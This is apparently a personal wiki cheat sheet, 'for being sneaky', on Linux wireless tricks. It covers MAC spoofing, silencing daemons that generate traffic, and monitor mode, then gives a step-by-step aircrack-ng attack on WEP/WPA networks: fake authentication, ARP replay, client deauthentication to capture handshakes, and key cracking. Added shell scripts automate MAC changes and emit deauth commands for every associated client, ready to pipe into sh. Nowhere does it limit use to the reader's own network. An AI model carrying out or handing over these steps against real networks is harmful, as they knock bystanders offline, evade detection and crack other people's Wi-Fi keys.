Linux Network Config (for being sneaky)

From TheBeard Science Project Wiki
exit #TO PREVENT EXECUTION OF THIS FILE

ifconfig wlan0 down
ifconfig wlan0 hw ether 00:11:22:33:44:55
ifconfig wlan0 up

macchanger -A wlan0 - set a random vendor MAC of any kind (bring the interface down first)
	-a - random vendor MAC of the same kind as the current one
	-r - fully random MAC
	-p - reset to the original (permanent) hardware MAC
	-m xx:xx:xx:xx:xx:xx - set a specific MAC
	-l - list known vendors
	-s - show current MAC
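The two MAC-spoofing methods above are shown here as an added shell example, not code from the original wiki page. It generates a random locally-administered unicast MAC, rejects one that the kernel would refuse (multicast bit set), and runs the page's down / hw ether / up sequence followed by a read-back from /sys so a driver that silently keeps the real MAC (the ndiswrapper case noted further down this page) is caught. The function names are my own; `valid_unicast_mac` and `random_laa_mac` run anywhere, `spoof_mac` needs root on a Linux box.

```shell
#!/bin/sh
# Added example, not part of the original wiki page.

# A MAC is usable on the wire only if the first octet's low bit (0x01, the
# multicast bit) is clear; ifconfig/ip reject multicast MACs with
# "Cannot assign requested address". Bit 0x02 marks it locally administered.
valid_unicast_mac() {
    mac=$1
    echo "$mac" | grep -Eq '^([0-9a-fA-F]{2}:){5}[0-9a-fA-F]{2}$' || return 1
    first=$(( 0x${mac%%:*} ))
    [ $(( first & 1 )) -eq 0 ]
}

# Six random bytes; force "locally administered, unicast" on the first one.
random_laa_mac() {
    bytes=$(od -An -N6 -tu1 /dev/urandom)
    set -- $bytes
    first=$(( ($1 | 2) & 254 ))
    printf '%02x:%02x:%02x:%02x:%02x:%02x\n' "$first" "$2" "$3" "$4" "$5" "$6"
}

# spoof_mac IFACE MAC: the page's ifconfig sequence, then verify what the
# kernel really has, because some drivers overwrite it with the real MAC.
spoof_mac() {
    dev=$1
    want=$(echo "$2" | tr 'A-Z' 'a-z')
    valid_unicast_mac "$want" || { echo "refusing invalid/multicast MAC $want" >&2; return 1; }
    ifconfig "$dev" down &&
    ifconfig "$dev" hw ether "$want" &&
    ifconfig "$dev" up || return 1
    now=$(cat "/sys/class/net/$dev/address")
    [ "$now" = "$want" ] || { echo "MAC on $dev is $now, not $want" >&2; return 1; }
}

# usage (as root):  spoof_mac wlan0 "$(random_laa_mac)"
```

If the read-back fails, the driver is ignoring `hw ether`; that is the situation the ndiswrapper note below describes, and the fix has to happen in the driver's own config rather than with ifconfig.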


daemons to shut off:
	smbd
	nmbd
	clamav-freshclam
	network-manager
	unattended-upgrades
		
	(packet sniff to find out if anything else is generating traffic from your machine)
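For the "packet sniff" step, here is an added shell example (mine, not from the wiki page) that boils `tcpdump -nn` output down to which destination:port pairs your own address is talking to, so you can spot a daemon that is still chattering after you thought you had stopped everything. The tcpdump lines are constructed for the example, the local address 192.168.1.23 and the remote 203.0.113.10 are assumptions, and port 137 is what nmbd (NetBIOS name service) broadcasts on.

```shell
#!/bin/sh
# Added example, not part of the original wiki page.

# Constructed sample of `tcpdump -nn -i wlan0` output. Our address is
# assumed to be 192.168.1.23; 203.0.113.10 stands in for some update mirror.
SAMPLE='12:00:01.000001 IP 192.168.1.23.137 > 192.168.1.255.137: UDP, length 50
12:00:01.100000 IP 192.168.1.23.44123 > 203.0.113.10.80: Flags [S], seq 1, win 29200, length 0
12:00:02.000000 IP 192.168.1.23.137 > 192.168.1.255.137: UDP, length 50
12:00:02.500000 IP 192.168.1.5.445 > 192.168.1.23.51000: Flags [.], ack 1, win 100, length 0
12:00:03.000000 IP 192.168.1.23.44124 > 203.0.113.10.80: Flags [S], seq 1, win 29200, length 0
12:00:03.000000 ARP, Request who-has 192.168.1.1 tell 192.168.1.23, length 28'

# outbound_summary LOCAL_IP  <  tcpdump -nn output
# Prints "count dst:port" for every packet whose source is LOCAL_IP,
# most frequent first. Inbound packets and ARP are ignored.
outbound_summary() {
    awk -v me="$1" '
        $2 == "IP" {
            src = $3; dst = $5
            sub(/:$/, "", dst)                 # strip the trailing colon
            split(src, a, ".")                 # a.b.c.d.port
            sip = a[1] "." a[2] "." a[3] "." a[4]
            if (sip == me) {
                m = split(dst, d, ".")
                key = d[1] "." d[2] "." d[3] "." d[4] ":" d[m]
                count[key]++
            }
        }
        END { for (k in count) print count[k], k }
    ' | sort -rn
}

# usage:  tcpdump -nn -i wlan0 -l | outbound_summary 192.168.1.23
#    or:  printf '%s\n' "$SAMPLE" | outbound_summary 192.168.1.23
```

With the sample input this reports two packets to 192.168.1.255:137 (nmbd's NetBIOS broadcasts) and two to 203.0.113.10:80. To map a port back to the process that owns it, use `ss -tulnp` for listening sockets or `ss -tunp` for established ones, then stop that daemon.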


promiscuous mode:
	ifconfig wlan0 promisc
remove:
	ifconfig wlan0 -promisc


monitor mode:
	ifconfig wlan0 down
	iwconfig wlan0 mode monitor
	ifconfig wlan0 up

back to managed mode:
	ifconfig wlan0 down
	iwconfig wlan0 mode managed
	ifconfig wlan0 up


ifconfig wlan0 192.168.1.1 netmask 255.255.255.0 - set a static address

	the hw ether MAC change above does not always work, for instance with a wireless card using
	ndiswrapper. there you need to change the .conf file within your driver's folder located in
	/etc/ndiswrapper/

	which reportedly works: you simply change the line mac_address|XX:XX:XX:XX:XX:XX
	to mac_address|

	I do not currently have that working on Gentoo Linux at the moment; however,
	it's worked for a couple of people out there and it -is- the method listed for the wiki.
	Simply bringing wlan0 down and running ifconfig wlan0 hw ether
	does not work with my Gentoo build using ndiswrapper; it seems to be overwritten with the
	real MAC address repeatedly.

/etc/sysconfig/network-scripts/ifcfg-<iface> - per-interface configuration (Red Hat/CentOS style)

service network restart - restart networking (Red Hat/CentOS)
service networking restart - restart networking (Debian/Ubuntu)

dhcpcd wlan0 - get an address for wlan0 via DHCP
dhclient -4 -s 11.22.33.44 wlan0 - same with dhclient, IPv4 only, sending the requests to the DHCP server at 11.22.33.44 instead of broadcasting

################ WEP/WPA ###################

SPOOF
spoof the MAC on both wlan0 and the monitor interface (mon0); the -h address used below must be the one the card actually transmits with

INTERFACE
airmon-ng start wlan0 - creates a new interface called mon0 that can monitor and inject (newer versions name it wlan0mon instead)
airmon-ng stop mon0 - removes mon0
airmon-ng check kill - stops processes such as network-manager that would otherwise fight over the card

MONITOR
airodump-ng mon0 - hops across all channels
	channels 1-14 are 802.11b & g (2.4 GHz).
	channels 36 and up (36-165) are 802.11a (5 GHz).
	MB = max speed. 11 is 802.11b and 54 is 802.11g

PACKETS
every WEP packet carries a 24-bit initialization vector (IV). the number of IVs captured is shown under #Data.
	PTW cracking (the default; works on ARP packets, so it needs a full .cap capture, not just IVs):
		64 bit  - roughly 20k IVs.
		128 bit - roughly 40k-85k IVs.
	FMS/Korek cracking:
		64 bit  - roughly 250k IVs.
		128 bit - roughly 1.5m IVs.
	(figures as given in the aircrack-ng documentation; fewer with luck, more with a noisy capture)

TEST INJECTION
aireplay-ng -9 -e ssid -a 00:00:00:00:00:00 mon0
	-9 - test
	-e essid name
	-a AP address

ATTACK/INJECTION TEST
aireplay-ng -9 mon0
	-i wlan1 - card-to-card test: a second card (wlan1) plays the AP, which gives a more reliable result than testing against real APs

CAPTURE
airodump-ng -c 11 -d 00:00:00:00:00:00 -w dump mon0
	-d - bssid of target (same as --bssid)
	listens on channel 11 to the access point with that bssid and writes the capture to files prefixed "dump" (dump-01.cap, dump-01.csv, ...; the number increments on each run).
	channel is optional, but fixing it stops channel hopping so you capture far more of the target's packets.

FAKE AUTHENTICATION (NEEDED BEFORE INJECTING)
aireplay-ng -1 0 -e ssid -a 00:00:00:00:00:00 -h 11:11:11:11:11:11 mon0
associates your MAC with the AP so that it accepts injected frames; required for ARP replay when no real client is connected.
	-1 - fake authentication (followed by the reassociation delay in seconds; 0 = authenticate once)
	-e - essid
	-a - bssid
	-h - your mac address (must match what the card really sends, or the AP drops your frames)
if it doesn't work, try -1 6000 -o 1 -q 10 (reassociate every 6000 s, one packet per burst, keepalive every 10 s)
or put it in a loop (about every 2.5 sec)
this is open-system authentication only: it generates little traffic by itself and does not give you a WPA handshake (that needs a real client, see the deauth section below).

PRODUCE TRAFFIC (ARP REPLAY)
while running airodump-ng...
aireplay-ng --arpreplay -b 00:00:00:00:00:00 -h 11:11:11:11:11:11 mon0
	--arpreplay (same as -3) - waits for one ARP request, then replays it so the AP answers with fresh IVs
	-b - bssid of AP
	-h - your mac address (the one you fake-authenticated with)
this produces a lot of ARP requests and traffic. noticeable.
if packets stop flowing, reduce the replay speed with -x <packets/sec>. default 50.
also, try generating an ARP request by pinging a non-existent ip address on the target network from a connected client.

DISCONNECT PACKET FOR WPA HANDSHAKE (DEAUTH)
while running airodump-ng locked to the AP's channel with -c...
aireplay-ng -0 1 -a 00:00:00:00:00:00 -c 11:11:11:11:11:11 mon0
	-0 - deauth (followed by the number of deauth bursts to send; 0 = keep going until stopped)
	-a bssid of AP
	-c client to disconnect (leave it out to deauth every client with a broadcast, which is far noisier)
the client reconnecting is what produces the 4-way handshake; airodump-ng shows "WPA handshake: <bssid>" in its top line once it has captured one.
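Picking the `-c` client is the fiddly part: it has to be a station that is actually associated with the target BSSID, otherwise there is nothing to reconnect and no handshake. The shell below is an added example (mine, not from the wiki page) that reads the CSV airodump-ng writes next to the .cap (with `-w dump` that is dump-01.csv), lists the stations associated with a BSSID, and prints one deauth command per station. The CSV content is constructed; the BSSIDs, station MACs and interface name mon0 are made up for the example.

```shell
#!/bin/sh
# Added example, not part of the original wiki page.

# Constructed airodump-ng CSV: an AP block, a blank line, then a station block.
# The station block's 6th column is the BSSID the station is associated with,
# or "(not associated)" for a client that is only probing.
SAMPLE_CSV='
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
00:11:22:33:44:55, 2010-01-01 12:00:00, 2010-01-01 12:05:00,  6,  54, WPA2, CCMP, PSK, -40,  120,  0,   0.  0.  0.  0,   7, TestNet, 
66:77:88:99:AA:BB, 2010-01-01 12:00:00, 2010-01-01 12:05:00, 11,  54, WEP, WEP, , -70,  80,  0,   0.  0.  0.  0,   5, Other, 

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
AA:BB:CC:DD:EE:01, 2010-01-01 12:00:10, 2010-01-01 12:04:59, -50,  300, 00:11:22:33:44:55, TestNet
AA:BB:CC:DD:EE:02, 2010-01-01 12:01:00, 2010-01-01 12:04:30, -65,   20, 00:11:22:33:44:55, 
AA:BB:CC:DD:EE:03, 2010-01-01 12:02:00, 2010-01-01 12:03:00, -80,    5, (not associated), TestNet,Other
AA:BB:CC:DD:EE:04, 2010-01-01 12:02:00, 2010-01-01 12:04:00, -60,   40, 66:77:88:99:AA:BB, 
'

# clients_of BSSID  <  dump-01.csv
# Prints the MAC of every station associated with BSSID, in file order.
# Only the station section (after the "Station MAC" header) is looked at.
clients_of() {
    awk -F', *' -v ap="$1" '
        /^Station MAC/ { stations = 1; next }
        stations && NF >= 6 && toupper($6) == toupper(ap) { print $1 }
    '
}

# deauth_cmds BSSID MON [N]  <  dump-01.csv
# One targeted deauth command per associated client; N bursts each (default 1).
deauth_cmds() {
    ap=$1; mon=$2; n=${3:-1}
    clients_of "$ap" | while read -r sta; do
        printf 'aireplay-ng -0 %s -a %s -c %s %s\n' "$n" "$ap" "$sta" "$mon"
    done
}

# usage:  deauth_cmds 00:11:22:33:44:55 mon0 < dump-01.csv
#    or:  deauth_cmds 00:11:22:33:44:55 mon0 < dump-01.csv | sh
```

The client with the most packets (here AA:BB:CC:DD:EE:01) is the best first target, since an active client reconnects quickly and a weak or idle one may not come back at all. After the deauth, `aircrack-ng dump-01.cap` with no other options lists each network with the number of handshakes it found, which is the check that the capture is worth running a wordlist against.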

CRACKING
aircrack-ng -b 00:00:00:00:00:00 dump*.cap
	-b bssid of AP (optional if the capture contains only one AP)
	capture file (use * to feed all capture files from repeated runs)
	-n - key length: 64 or 128 bit
	-K - use the FMS/Korek method instead
	default method is PTW

FOR WPA/WPA2
run aircrack-ng with "-w word.lst" to run a dictionary attack against the captured handshake using the wordlist word.lst.
aircrack-ng ships a sample list at /usr/share/doc/aircrack-ng/examples/password.lst.gz (gunzip it first).
without a handshake in the capture there is nothing to crack; WPA/WPA2 has no IV statistics to collect, only the handshake and the wordlist matter.

CHANNEL
if airodump-ng or aireplay-ng complain about a fixed channel (e.g. "fixed channel mon0: -1"), redo monitor mode:
	ifconfig wlan0 down
	iwconfig wlan0 mode monitor
	ifconfig wlan0 up